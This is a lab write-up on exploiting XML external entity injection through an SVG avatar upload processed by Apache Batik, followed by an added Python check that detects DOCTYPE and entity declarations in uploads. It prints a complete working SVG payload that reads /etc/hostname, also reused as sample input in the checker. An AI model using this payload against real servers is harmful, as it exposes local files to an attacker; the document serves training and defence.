Exploiting XXE via image file upload

Description

This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the "Submit solution" button to submit the value of the server hostname.

Approach

Upon accessing the lab, I headed straight to the comments section, where I found an avatar image upload feature, which I immediately recognized as a potential avenue for XXE. To exploit XXE, I needed to get XML into the system, and SVG (Scalable Vector Graphics) files, being XML-based, were an ideal choice. So I crafted a sample SVG file like the following:

<?xml version="1.0" standalone="yes"?>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-family="Verdana" font-size="16" x="0" y="16">&xxe;</text>
</svg>

Then I wrote the DOCTYPE declaration that defines the external entity to inject into it:

<!DOCTYPE ichyaboy [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>

Combining the two, the full payload looked something like this:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ichyaboy [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-family="Verdana" font-size="16" x="0" y="16">&xxe;</text>
</svg>

I saved this payload in a text file and uploaded it. After navigating to my comment and opening the avatar, I saw the hostname rendered in the image. Submitting that value solved the lab.
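As an added defender-side example (my own code, not part of this writeup or of Batik), here is a pre-upload check that flags exactly what this payload depends on: a DOCTYPE, an entity declared with a SYSTEM identifier, and an external entity reference in content. It parses once with the stdlib expat parser without resolving anything, and only accepts a well-formed document whose root is an SVG element; the sample inputs are the payload above and a constructed clean avatar.

```python
# Added example: stdlib-only pre-upload SVG check (not Batik's own configuration).
import xml.parsers.expat as expat

SVG_ROOT = "http://www.w3.org/2000/svg svg"  # "<namespace> <local name>" with sep=" "

# Sample inputs: the payload from this writeup, and a constructed clean avatar.
LAB_PAYLOAD = (b'<?xml version="1.0" standalone="yes"?>'
               b'<!DOCTYPE ichyaboy [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>'
               b'<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
               b'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
               b'<text font-family="Verdana" font-size="16" x="0" y="16">&xxe;</text></svg>')
CLEAN_AVATAR = (b'<?xml version="1.0"?><svg width="128px" height="128px" '
                b'xmlns="http://www.w3.org/2000/svg"><circle cx="64" cy="64" r="40"/></svg>')

def inspect_svg(data: bytes) -> dict:
    """Parse once without resolving anything; report DTD/entity use and the root element."""
    findings, root = [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE '{name}' declared")
        if sysid or pubid:
            findings.append(f"external DTD referenced: {sysid or pubid}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        findings.append(f"{kind} entity '{name}' declared -> {sysid or pubid or '(internal value)'}")

    def on_external_ref(context, base, sysid, pubid):
        findings.append(f"external entity reference in content -> {sysid}")
        return 1  # report success so parsing continues; nothing is fetched

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser = expat.ParserCreate(namespace_separator=" ")
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except expat.ExpatError as err:
        findings.append(f"malformed XML: {err}")

    root_name = root[0] if root else None
    if root_name != SVG_ROOT:
        findings.append(f"root element is not an SVG: {root_name!r}")
    # Accept only a well-formed SVG with no DOCTYPE, no entities and no external references.
    return {"accepted": not findings, "root": root_name, "findings": findings}
```

Run against LAB_PAYLOAD the report lists the DOCTYPE, the entity pointing at file:///etc/hostname and the reference in the text element, so the upload is rejected before any image library sees it.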